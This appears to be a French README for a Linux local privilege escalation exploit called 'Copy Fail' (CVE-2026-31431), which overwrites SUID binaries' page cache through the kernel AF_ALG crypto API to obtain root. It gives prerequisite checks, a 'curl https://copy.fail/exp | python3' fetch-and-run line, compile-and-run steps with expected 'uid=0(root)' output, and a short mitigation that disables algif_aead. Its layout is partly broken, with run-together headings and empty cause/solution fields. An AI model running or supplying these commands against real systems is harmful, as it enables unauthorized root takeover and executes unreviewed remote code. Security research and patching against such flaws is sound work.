
Exploit d'élévation de privilèges local sous Linux pour CVE-2026-31431, écrasant le cache de pages des binaires SUID via l'API cryptographique du noyau AF_ALG afin d'obtenir un accès root.
Ce contenu est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Ne l'exécutez PAS sur des systèmes sans autorisation explicite.
Copy Fail (CVE-2026-31431) est une vulnérabilité d'élévation de privilèges locale (LPE) sous Linux affectant l'API crypto du noyau via AF_ALG.
Elle permet à un utilisateur non privilégié d'écraser les données du cache de pages d'un binaire SUID (par exemple, /usr/bin/su) et d'obtenir un accès root.
AF_ALG activéalgif_aead chargéos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
Indicateurs attendus :
authencesn(hmac(sha256),cbc(aes))algif_aead chargépython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
Résultat attendu :
uid=0(root)
os.splice not foundCause :
Solution :
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
Causes possibles :
Installez les outils requis :
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
Mettez à jour votre système :
apt update && apt upgrade
Si l'exploit échoue, envisagez :
Utilisez cet exploit de manière responsable uniquement dans des laboratoires, des CTF et des pentests autorisés.